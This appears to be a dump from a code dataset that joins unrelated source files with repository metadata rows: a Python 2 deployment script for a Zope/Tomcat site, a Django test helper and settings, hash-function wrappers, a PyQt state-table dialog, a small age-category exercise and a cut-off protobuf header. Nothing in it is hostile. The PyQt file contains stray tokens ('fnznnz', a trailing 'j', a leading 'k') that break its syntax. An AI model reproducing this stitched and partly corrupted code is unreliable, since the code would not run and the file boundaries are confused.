g.add_argument(u'--supervisor-password', metavar=u'PASSWORD', help='Use %(metavar)s insetad of a random password')
g.add_argument(u'--tomcat-user', metavar=u'USERNAME', default=u'tomcat-admin',
help=u'Override the Tomcat username "%(default)s" with %(metavar)s')
g.add_argument(u'--tomcat-password', metavar=u'PASSWORD', help=u'Use %(metavar)s instead of a random password')
g.add_argument(u'--zope-user', metavar=u'USERNAME', default=u'zope-admin',
help=u'Override the Zope app server username "%(default)s" with %(metavar)s')
g.add_argument(u'--zope-password', metavar=u'PASSWORD', help=u'Use %(metavar)s instead of a random password')
g = p.add_argument_group(u'Executables', u'These will be searched on the executable PATH unless overridden.')
g.add_argument(u'--with-java', metavar=u'PATH', help=u'Use the Java language at %(metavar)s')
g.add_argument(u'--with-lynx', metavar=u'PATH', help=u'Use the lynx plain-text browser at %(metavar)s')
g.add_argument(u'--with-nginx', metavar=u'PATH', help=u'Use the nginx web server at %(metavar)s')
g.add_argument(u'--with-pdftohtml', metavar=u'PATH', help=u'Use the pdftohtml converter at %(metavar)s')
g.add_argument(u'--with-varnishd', metavar=u'PATH', help=u'Use the varnishd cache at %(metavar)s')
g.add_argument(u'--with-wvHtml', metavar=u'PATH', help=u'Use the wvHtml Word converter at %(metavar)s')
g.add_argument(u'--with-python', metavar=u'PATH', help=u'Use the Python language at %(metavar)s',
default=sys.executable)
return p
def _findExecutable(name, location=None):
logging.debug(u'Looking for executable "%s"%s', name,
u' (Possibly at {})'.format(location) if location is not None else u'')
if location:
if not os.path.isfile(location):
raise DeploymentError(u'The "{}" at "{}" is not a file'.format(name, location))
if not os.access(location, os.X_OK):
raise DeploymentError(u'The "{}" at "{}" is not executable'.format(name, location))
return location
for d in os.environ['PATH'].split(u':'):
candidate = os.path.join(d, name)
if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
return candidate
raise DeploymentError(u'Executable "{}" not found in PATH'.format(name))
def _checkVarnish(path):
logging.info('Checking varnishd version')
output = subprocess.check_output([path, u'-V'], stderr=subprocess.STDOUT)
if re.match(ur'varnishd \(varnish-3', output) is None:
raise DeploymentError(u'Varnish at "{}" needs to be version 3+'.format(path))
def _findExecutables(namespace):
logging.info('Finding dependent executables')
java = _findExecutable(u'java', namespace.with_java)
logging.info(u'Using java at %s', java)
nginx = _findExecutable(u'nginx', namespace.with_nginx)
logging.info(u'Using nginx at %s', nginx)
lynx = _findExecutable(u'lynx', namespace.with_lynx)
logging.info(u'Using lynx at %s', lynx)
pdftohtml = _findExecutable(u'pdftohtml', namespace.with_pdftohtml)
logging.info(u'Using pdftohtml at %s', pdftohtml)
varnishd = _findExecutable(u'varnishd', namespace.with_varnishd)
logging.info(u'Using varnishd at %s', varnishd)
wvHtml = _findExecutable(u'wvHtml', namespace.with_wvHtml)
logging.info(u'Using wvHtml at %s', wvHtml)
python = _findExecutable(u'python2.7', namespace.with_python)
logging.info(u'Using python2.7 at %s', python)
return dict(java=java, nginx=nginx, lynx=lynx, pdftohtml=pdftohtml, python=python, varnishd=varnishd, wvHtml=wvHtml)
def _checkLibrary(lib, func, libdirs):
logging.debug('Checking for %s in %s (extra libdirs: %r)', func, lib, libdirs)
fd, fn = tempfile.mkstemp(suffix='.c')
out = os.fdopen(fd, 'w')
out.write(_cHeader)
out.write('char %s();\nint main() {\nreturn %s();}\n' % (func, func))
out.close()
args = ['cc', fn, '-l{}'.format(lib)]
args.extend(['-L{}'.format(i) for i in libdirs])
_execAndLog(args)
os.remove('a.out')
def _checkLibraries(namespace):
logging.info('Finding dependent libraries and headers')
extraLibdirs = namespace.libdir
if extraLibdirs is None:
extraLibdirs = []
for lib, func in (
('xml2', 'xmlNewEntity'),
('xslt', 'xsltInit'),
):
logging.info('Checking for %s', lib)
_checkLibrary(lib, func, extraLibdirs)
# If we get here, then _checkLibrary didn't raise any exception and we found our symbols.
# Note: we should also check versions.
return extraLibdirs
def _getUserID():
logging.info(u'Getting user ID')
username = pwd.getpwuid(os.getuid())[0]
logname = os.environ['LOGNAME']
if logname != username:
logging.warning("LOGNAME \"%s\" does not match current user ID's account name \"%s\", preferring latter",
logname, username)
return username
def _installVirtualEnv(python):
logging.info(u'Installing virtualenv %s', _virtualEnvVersion)
sentinel = os.path.join(u'virtualenv-{}'.format(_virtualEnvVersion),u'virtualenv_support',u'__init__.py')
if not os.path.isfile(sentinel):
logging.debug(u'Downloading from %s', _virtualEnvURL)
with _download(_virtualEnvURL) as f:
tf = tarfile.open(fileobj=f, mode='r:gz')
tf.extractall()
else:
logging.debug(u'Found virtualenv already')
sentinel = os.path.join(u'python2.7', 'bin', 'activate.csh')
if not os.path.isfile(sentinel):
logging.debug(u'Installing virtualenv for python2.7')
ve = os.path.join(u'virtualenv-{}'.format(_virtualEnvVersion), u'virtualenv.py')
subprocess.check_call([python, ve, u'python2.7'])
else:
logging.debug(u'Found virtualenv python already')
# Check for upgraded setuptools?
def _checkCWD():
logging.info(u"Checking what directory we're in")
for name, test in (
('bootstrap.py', os.path.isfile),
('etc', os.path.isdir),
('ops.cfg', os.path.isfile),
('static', os.path.isdir),
('templates', os.path.isdir)
):
if not test(name):
raise DeploymentError(u"File/dir \"{}\" missing; are you running from the right directory?".format(name))
def _download(url):
tf = tempfile.TemporaryFile()
with contextlib.closing(urllib2.urlopen(url)) as con:
while True:
buf = con.read(_bufsiz)
if len(buf) == 0:
break
tf.write(buf)
tf.flush()
tf.seek(0)
return tf
def _installSiteConfig(
executables, extraPaths, libdirs, superUser, superPassword, tomcatUser, tomcatPassword,
zopeUser, zopePassword, hostname, http, https, userID, buildoutCache
):
logging.info(u'Creating site.cfg')
javaHome = os.path.dirname(os.path.dirname(executables['java']))
with open(u'site.cfg', 'w') as f:
f.write(u'[buildout]\n')
f.write(u'extends = ops.cfg\n')
for directive, directory in (
(u'download-cache', u'downloads'),
(u'eggs-directory', u'eggs'),
(u'extends-cache', u'extends')
):
directory = os.path.abspath(os.path.join(buildoutCache, directory))
f.write(u'{} = {}\n'.format(directive, directory))
f.write(u'[hosts]\n')
f.write(u'public-address = {}\n'.format(hostname))
f.write(u'[ports]\n')
f.write(u'nginx = {}\n'.format(http))
f.write(u'nginx-ssl = {}\n'.format(https))
f.write(u'[supervisor]\n')
f.write(u'username = {}\n'.format(superUser))
f.write(u'password = {}\n'.format(superPassword))
f.write(u'[tomcat]\n')
f.write(u'username = {}\n'.format(tomcatUser))
f.write(u'password = {}\n'.format(tomcatPassword))
f.write(u'[zope]\n')
f.write(u'username = {}\n'.format(zopeUser))
f.write(u'password = {}\n'.format(zopePassword))
f.write(u'[paths]\n')
f.write(u'java = {}\n'.format(executables['java']))
f.write(u'java_home = {}\n'.format(javaHome))
f.write(u'nginx = {}\n'.format(executables['nginx']))
f.write(u'varnishd = {}\n'.format(executables['varnishd']))
f.write(u'extra = {}\n'.format(u':'.join(extraPaths)))
if len(libdirs):
f.write(u'libs = {}\n'.format(u':'.join(libdirs)))
f.write(u'[users]\n')
for i in (u'nginx', u'tomcat', u'varnish', u'zeo', u'zope'):
f.write(u'{} = {}\n'.format(i, userID))
def _checkBuildoutCache(directory):
logging.info(u'Checking buildout cache')
def reportError(error):
raise DeploymentError(u'Cannot access "{}" (errno: {})'.format(error.filename, error.strerror))
logging.debug(u'Traversing all files/dirs under %s for writeability', directory)
for root, dirs, files in os.walk(directory, onerror=reportError):
for d in dirs:
d = os.path.abspath(os.path.join(root, d))
if not os.access(d, os.R_OK | os.X_OK | os.W_OK):
raise DeploymentError(u'Cannot read, write, and traverse "{}"'.format(d))
for f in files:
f = os.path.abspath(os.path.join(root, f))
if not os.access(f, os.R_OK | os.W_OK):
raise DeploymentError(u'Cannot read and write "{}"'.format(f))
for d in ('eggs', 'downloads', 'extends'):
d = os.path.abspath(os.path.join(directory, d))
logging.debug(u'Checking if %s is a directory', d)
if not os.path.isdir(d):
logging.debug(u'Creating %s', d)
os.makedirs(d)
def _getCredentials(kind, options):
username = getattr(options, u'{}_user'.format(kind))
passwd = getattr(options, u'{}_password'.format(kind), None)
if passwd is None:
chars = string.letters + string.digits
passwd = ''.join([random.choice(chars) for i in range(20)])
return username, passwd
def _execAndLog(args):
logging.debug(u'>>> %r', args)
sub = subprocess.Popen(args, bufsize=1, stdout=subprocess.PIPE, stderr=subprocess.STDOUT,
close_fds=True, universal_newlines=True)
output, error = sub.communicate()
sub.wait()
for line in output.split('\n'):
logging.debug(u'... %s', line)
if sub.returncode != 0:
raise DeploymentError(u'Subprocess call failed with return code {} (command was {})'.format(sub.returncode,
repr(args)))
def _bootstrap():
logging.info(u'Bootstrapping the buildout')
args = [
os.path.join(u'python2.7', u'bin', u'python2.7'),
u'bootstrap.py',
u'--buildout-version={}'.format(_buildoutVersion),
u'--setuptools-version={}'.format(_setupToolsVersion),
'-c',
u'site.cfg'
]
_execAndLog(args)
def _buildout():
logging.info(u'Building out; this can take a long time')
args = [os.path.join(u'bin', u'buildout'), u'-c', u'site.cfg']
_execAndLog(args)
def _checkSite(directory):
logging.info(u'Checking old IPDA site at "%s"', directory)
var = os.path.abspath(os.path.join(directory, u'var'))
database = os.path.join(var, u'filestorage', u'Data.fs')
logging.debug(u'Testing if database file %s exists', database)
if not os.path.isfile(database):
raise DeploymentError(u'Existing site at "{}" lacks a database at "{}"'.format(directory, database))
blobs = os.path.join(var, u'blobstorage')
logging.debug(u'Testing if blob directory %s exists', blobs)
if not os.path.isdir(blobs):
raise DeploymentError(u'Existing site at "{}" lacks blobstorage at "{}"'.format(directory, blobs))
def _copyContent(directory):
logging.info(u'Copying content from existing IPDA site at "%s"', directory)
var = os.path.abspath(os.path.join(directory, u'var'))
database = os.path.join(var, u'filestorage', u'Data.fs')
targetDir = os.path.abspath(os.path.join(u'var', u'filestorage'))
if not os.path.isdir(targetDir):
logging.debug(u'Creating directory %s', directory)
os.makedirs(targetDir)
logging.debug(u'Copying %s to %s', database, targetDir)
shutil.copy(database, targetDir)
blobs = os.path.join(var, u'blobstorage')
targetDir = os.path.abspath(os.path.join(u'var', u'blobstorage'))
if os.path.isdir(targetDir):
logging.debug(u'Removing directory %s', targetDir)
shutil.rmtree(targetDir)
logging.debug(u'Copying tree %s to var', blobs)
shutil.copytree(blobs, os.path.abspath(u'var/blobstorage'))
registryDir = os.path.abspath(os.path.join(u'var', u'registry'))
if os.path.isdir(registryDir):
logging.debug(u'Removing barebones registry db at %s', registryDir)
shutil.rmtree(registryDir)
registryDB = os.path.join(var, u'registry')
logging.debug(u'Copying tree %s to var', registryDB)
shutil.copytree(registryDB, os.path.abspath(u'var/registry'))
def _deployEmptySite():
logging.info(u'Deploying IPDA website with minimal content')
args = [os.path.join(u'bin', u'buildout'), u'-c', u'site.cfg', 'install', 'basic-site']
_execAndLog(args)
def _upgradeSite(user, password):
logging.info(u'Setting up new Zope user and upgrading site')
args = [os.path.join(u'bin', u'zope-debug'), u'run', os.path.join(u'support', u'upgrade.py'), user, password]
_execAndLog(args)
def main(argv):
_setupLogging()
_checkCWD()
parser = _getArgParser()
ns = parser.parse_args(argv[1:])
if ns.existing:
_checkSite(ns.existing)
executables = _findExecutables(ns)
_checkVarnish(executables['varnishd'])
libdirs = _checkLibraries(ns)
extraPaths = set()
for path in (executables['lynx'], executables['pdftohtml'], executables['wvHtml']):
directory = os.path.dirname(path)
extraPaths.add(directory)
logging.debug(u'Extra PATH to set: %s', extraPaths)
userID = _getUserID()
logging.info(u'Processes will run with user ID "%s"', userID)
_checkBuildoutCache(ns.buildout_cache)
_installVirtualEnv(executables['python'])
superUser, superPassword = _getCredentials(u'supervisor', ns)
tomcatUser, tomcatPassword = _getCredentials(u'tomcat', ns)
zopeUser, zopePassword = _getCredentials(u'zope', ns)
_installSiteConfig(executables, extraPaths, libdirs, superUser, superPassword, tomcatUser, tomcatPassword,
zopeUser, zopePassword, ns.public_hostname, ns.http_port, ns.https_port, userID, ns.buildout_cache)
_bootstrap()
_buildout()
if ns.existing:
_copyContent(ns.existing)
_upgradeSite(zopeUser, zopePassword)
else:
_deployEmptySite()
return True
if __name__ == '__main__':
sys.exit(0 if main(sys.argv) else -1)
| 46.141732 | 121 | 0.659158 | 2,380 | 17,580 | 4.810084 | 0.203782 | 0.027778 | 0.015898 | 0.018169 | 0.276555 | 0.221611 | 0.189465 | 0.121681 | 0.103337 | 0.071716 | 0 | 0.003861 | 0.189647 | 17,580 | 380 | 122 | 46.263158 | 0.799733 | 0.020193 | 0 | 0.064706 | 0 | 0.005882 | 0.288046 | 0.007783 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.064706 | 0.005882 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
7eb546f1428e9e46c412c95c4b290bb93627a3b7 | 713 | py | Python | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | global_id/tests/utils/callers/guid_caller.py | ThePokerFaCcCe/messenger | 2db3d5c2ccd05ac40d2442a13d664ca9ad3cb14c | [
"MIT"
] | null | null | null | from django.urls.base import reverse
from rest_framework import status
from global_id.urls import app_name
from core.tests.utils import BaseCaller
from ..creators import create_guid
def guid_detail_url(guid=None):
return reverse(f"{app_name}:guid-detail",
kwargs={'guid': guid or create_guid().guid})
class GUIDViewCaller(BaseCaller):
def retrieve__get(self, access_token, guid: str = None,
allowed_status=status.HTTP_200_OK):
"""Calls guid-detail view with GET method"""
return self.assert_status_code(
allowed_status, self.client.get,
guid_detail_url(guid),
**self.get_auth_header(access_token)
)
| 31 | 63 | 0.678822 | 94 | 713 | 4.914894 | 0.521277 | 0.08658 | 0.056277 | 0.073593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005474 | 0.231417 | 713 | 22 | 64 | 32.409091 | 0.837591 | 0.053296 | 0 | 0 | 0 | 0 | 0.038864 | 0.032885 | 0 | 0 | 0 | 0 | 0.0625 | 1 | 0.125 | false | 0 | 0.3125 | 0.0625 | 0.625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
0e22d4557755570980a88c3dd6efa6cf9f1ddd9e | 3,600 | py | Python | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | backend/config/settings/base.py | r0tii/process-status-viewer | 6c94a7a6f5e37f37f63d6140c806a0b6fc49ae1c | [
"MIT"
] | null | null | null | """
Base settings to build other settings files upon.
"""
from pathlib import Path
import environ
env = environ.Env()
# GENERAL
# -------------------------------------------------------------------------
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent.parent
PROJECT_NAME = "process_status_monitoring"
APPS_DIR = BASE_DIR / PROJECT_NAME
SECRET_KEY = env("SECRET_KEY")
DEBUG = env("DEBUG")
# APPS
# ------------------------------------------------------------------------------
INSTALLED_APPS = [
# django
"django.contrib.admin",
"django.contrib.auth",
"django.contrib.contenttypes",
"django.contrib.sessions",
"django.contrib.messages",
"django.contrib.staticfiles",
# third-party
"rest_framework",
"corsheaders",
# Local
"process_status_monitoring.processes.apps.ProcessesConfig",
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
MIDDLEWARE = [
"django.middleware.security.SecurityMiddleware",
"corsheaders.middleware.CorsMiddleware",
"django.contrib.sessions.middleware.SessionMiddleware",
"django.middleware.common.CommonMiddleware",
"django.middleware.csrf.CsrfViewMiddleware",
"django.contrib.auth.middleware.AuthenticationMiddleware",
"django.contrib.messages.middleware.MessageMiddleware",
"django.middleware.clickjacking.XFrameOptionsMiddleware",
]
# DATABASES
# ------------------------------------------------------------------------------
DEFAULT_AUTO_FIELD = "django.db.models.BigAutoField"
# PROJECT CONFIG
# ------------------------------------------------------------------------------
ROOT_URLCONF = "config.urls"
WSGI_APPLICATION = "config.wsgi.application"
APPEND_SLASH = False
# REST FRAMEWORK
# ------------------------------------------------------------------------------
REST_FRAMEWORK = {
"DEFAULT_RENDERER_CLASSES": [
"rest_framework.renderers.JSONRenderer",
],
"DEFAULT_PARSER_CLASSES": [
"rest_framework.parsers.JSONParser",
],
}
# PASSWORD VALIDATION
# ------------------------------------------------------------------------------
AUTH_PASSWORD_VALIDATORS = [
{
"NAME": "django.contrib.auth.password_validation.UserAttributeSimilarityValidator", # noqa
},
{
"NAME": "django.contrib.auth.password_validation.MinimumLengthValidator",
},
{
"NAME": "django.contrib.auth.password_validation.CommonPasswordValidator",
},
{
"NAME": "django.contrib.auth.password_validation.NumericPasswordValidator",
},
]
# INTERNATIONALIZATION / LOCALIZATION
# ------------------------------------------------------------------------------
LANGUAGE_CODE = "en-us"
TIME_ZONE = "UTC"
USE_I18N = True
USE_L10N = True
USE_TZ = True
# STATIC FILES (CSS, JAVASCRIPT, IMAGES)
# ------------------------------------------------------------------------------
STATIC_URL = "/static/"
STATIC_ROOT = BASE_DIR / "staticfiles"
MEDIA_URL = "/media/"
MEDIA_ROOT = BASE_DIR / "media"
# TEMPLATES
# ------------------------------------------------------------------------------
TEMPLATES = [
{
"BACKEND": "django.template.backends.django.DjangoTemplates",
"DIRS": [],
"APP_DIRS": True,
"OPTIONS": {
"context_processors": [
"django.template.context_processors.debug",
"django.template.context_processors.request",
"django.contrib.auth.context_processors.auth",
"django.contrib.messages.context_processors.messages",
],
},
},
]
| 30.252101 | 99 | 0.536667 | 267 | 3,600 | 7.041199 | 0.449438 | 0.103723 | 0.063298 | 0.044681 | 0.082979 | 0.082979 | 0 | 0 | 0 | 0 | 0 | 0.001308 | 0.150278 | 3,600 | 118 | 100 | 30.508475 | 0.613272 | 0.287222 | 0 | 0.037975 | 0 | 0 | 0.551479 | 0.476923 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.063291 | 0.025316 | 0 | 0.025316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0e2735db31e23d6ef2afd7530322a682fcd103d9 | 2,703 | py | Python | hyperloglog/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | 2 | 2021-12-04T16:12:03.000Z | 2021-12-25T06:57:27.000Z | mincount/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | null | null | null | mincount/hashfunctions.py | mlkra/various-algorithms | 9cb2d21fe9ec0613c88e70f70e0ff1d471e43079 | [
"MIT"
] | null | null | null | from typing import Callable
import hashlib
import zlib
def __common(n: int, h: Callable, digest_size: int, b=0) -> float:
assert b <= digest_size
if b == 0:
return int.from_bytes(h(n.to_bytes(8, "big")).digest(), 'big') / 2**digest_size
else:
return (int.from_bytes(h(n.to_bytes(8, "big")).digest(), 'big') >> (digest_size - b)) / 2**b
def md5(n: int, b=0) -> float:
return __common(n, hashlib.md5, 128, b)
def sha1(n: int, b=0) -> float:
return __common(n, hashlib.sha1, 160, b)
def sha12(n: int) -> int:
return int(hashlib.sha1(n.to_bytes(8, "big")).hexdigest()[:8], 16)
def sha224(n: int, b=0) -> float:
return __common(n, hashlib.sha224, 224, b)
def sha256(n: int, b=0) -> float:
return __common(n, hashlib.sha256, 256, b)
def sha384(n: int, b=0) -> float:
return __common(n, hashlib.sha384, 384, b)
def sha512(n: int, b=0) -> float:
return __common(n, hashlib.sha512, 512, b)
def blake2b(n: int, b=0) -> float:
return __common(n, hashlib.blake2b, 512, b)
def blake2s(n: int, b=0) -> float:
return __common(n, hashlib.blake2s, 256, b) #pylint: disable=no-member
def blake2s2(n: int) -> int:
return int(hashlib.blake2s(n.to_bytes(8, "big")).hexdigest()[:8], 16) #pylint: disable=no-member
def sha3_224(n: int, b=0) -> float:
return __common(n, hashlib.sha3_224, 224, b)
def sha3_256(n: int, b=0) -> float:
return __common(n, hashlib.sha3_256, 256, b)
def sha3_384(n: int, b=0) -> float:
return __common(n, hashlib.sha3_384, 384, b)
def sha3_512(n: int, b=0) -> float:
return __common(n, hashlib.sha3_512, 512, b)
def adler32(n: int, b=0) -> float:
if b == 0:
return zlib.adler32(n.to_bytes(8, "big")) / 2**32
else:
return (zlib.adler32(n.to_bytes(8, "big")) >> (32 - b)) / 2**b
def adler322(n: int) -> int:
return zlib.adler32(n.to_bytes(8, "big"))
def crc32(n: int, b=0) -> float:
if b == 0:
return zlib.crc32(n.to_bytes(8, "big")) / 2**32
else:
return (zlib.crc32(n.to_bytes(8, "big")) >> (32 - b)) / 2**b
def crc322(n: int) -> int:
return zlib.crc32(n.to_bytes(8, "big"))
hash_functions = {
"md5": md5,
"sha1": sha1,
"sha224": sha224,
"sha256": sha256,
"sha384": sha384,
"sha512": sha512,
"blake2b": blake2b,
"blake2s": blake2s,
"sha3_224": sha3_224,
"sha3_256": sha3_256,
"sha3_384": sha3_384,
"sha3_512": sha3_512,
"adler32": adler32,
"crc32": crc32
}
def main():
for name, h in hash_functions.items():
a = [h(n, 16) for n in range(10000)]
print(name)
print(min(a))
print(max(a))
if __name__ == "__main__":
main()
| 22.525 | 101 | 0.594895 | 438 | 2,703 | 3.515982 | 0.150685 | 0.049351 | 0.048701 | 0.097403 | 0.553247 | 0.512987 | 0.483117 | 0.483117 | 0.4 | 0.238961 | 0 | 0.121198 | 0.221606 | 2,703 | 119 | 102 | 22.714286 | 0.610741 | 0.018498 | 0 | 0.08 | 0 | 0 | 0.05017 | 0 | 0 | 0 | 0 | 0 | 0.013333 | 1 | 0.266667 | false | 0 | 0.04 | 0.213333 | 0.6 | 0.04 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
0e2afcb852554bb61271877076847899b292fc37 | 4,128 | py | Python | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | App/components/combEntrada.py | Alexfm101/automata | a39760a04d384ef96ce49cac2517d7248380bd72 | [
"MIT"
] | null | null | null | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5.QtCore import *
data_edoSiguiente = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
data_entrada = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
data_edoActual = [[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],
[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4],[1, 2, 3, 4]]
fnznnz
class combEntrada(QDialog):
def __init__(self):
super(combEntrada ,self).__init__()
layout = QGridLayout()
self.setLayout(layout)
self.data_edoSiguiente = data_edoSiguiente
self.data_edoActual = data_edoActual
self.data_entrada = data_entrada
#tabla
entrada = QTableWidget(16, 4)
salida = QTableWidget(16, 4)
estado = QTableWidget(16, 4)
newitem = QTableWidgetItem()
label_entrada = QLabel()
label_entrada.setText("tabla de entradas")j
label_salida = QLabel()
label_salida.setText("Estado siguiente")
label_edo = QLabel()
label_edo.setText("estado actual")
#boton
ok = QPushButton('ok')
ok2 = QPushButton('ok2')
ok3 = QPushButton('ok3')
def _matrix():
k for i in range(0, 16):
for j in range(0, 4):
newitem = entrada.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_entrada[i][j] = a
def _matrix2():
for i in range(0, 16):
for j in range(0, 4):
newitem = salida.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_edoSiguiente[i][j] = a
def _matrix3():
for i in range(0, 16):
for j in range(0, 4):
newitem = estado.item(i, j)
if (newitem == None):
a = "x"
pass
elif (not newitem.text() == "1" and not newitem.text() == "0"):
a = "x"
pass
else:
a = newitem.text()
pass
data_edoActual[i][j] = a
def _print():
print(self.data_entrada)
def _print2():
print(self.data_edoSiguiente)
def _print3():
print(self.data_edoActual)
entrada.cellChanged.connect(_matrix)
salida.cellChanged.connect(_matrix2)
estado.cellChanged.connect(_matrix3)
ok.clicked.connect(_print)
ok2.clicked.connect(_print2)
ok3.clicked.connect(_print3)
#mostrar
layout.addWidget(entrada, 1, 0)
layout.addWidget(salida, 1, 1)
layout.addWidget(estado,1,2)
layout.addWidget(ok,2,0)
layout.addWidget(ok2, 2, 1)
layout.addWidget(ok3,2,2)
layout.addWidget(label_entrada, 0, 0)
layout.addWidget(label_salida, 0, 1)
layout.addWidget(label_edo,0,2)
| 33.024 | 83 | 0.428052 | 530 | 4,128 | 3.250943 | 0.141509 | 0.056878 | 0.083575 | 0.111434 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0.335461 | 0 | 0.108052 | 0.419331 | 4,128 | 124 | 84 | 33.290323 | 0.610763 | 0 | 0 | 0.405941 | 0 | 0 | 0.016066 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.089109 | 0.039604 | null | null | 0.089109 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 2 |
0e49791b45f3761db0f53cd99453bc620539bd37 | 456 | py | Python | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | 2 | 2021-06-22T00:15:11.000Z | 2021-08-02T11:28:56.000Z | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | null | null | null | Modulo 02/exercicios/d041.py | euyag/python-cursoemvideo | d2f684854d926e38ea193816a6c7d2c48d25aa3d | [
"MIT"
] | null | null | null | print('===== DESAFIO 041 =====')
nascimento = int(input('Digite o ano q vc nasceu: '))
idade = 2021 - nascimento
print(f'vc tem {idade} anos')
if idade <= 9:
print('vc é um nadador mirim')
elif idade > 9 and idade <= 14:
print('vc é um nadador infantil')
elif idade > 14 and idade <= 19:
print('vc é um nadador junior')
elif idade > 19 and idade <= 20:
print('vc é um nadador senior')
elif idade > 20:
print('vc é um nadador master') | 26.823529 | 53 | 0.631579 | 75 | 456 | 3.84 | 0.426667 | 0.121528 | 0.138889 | 0.173611 | 0.34375 | 0.166667 | 0.166667 | 0 | 0 | 0 | 0 | 0.059155 | 0.221491 | 456 | 17 | 54 | 26.823529 | 0.752113 | 0 | 0 | 0 | 0 | 0 | 0.391685 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.5 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 2 |
0e4f69138aecd1313f122259efebb214ee565651 | 19,502 | py | Python | venv/Lib/site-packages/tensorboard/uploader/proto/server_info_pb2.py | masterrey/SmartMachines | e48aff314b1171a13a39c3a41230d900bf090a1f | [
"Apache-2.0"
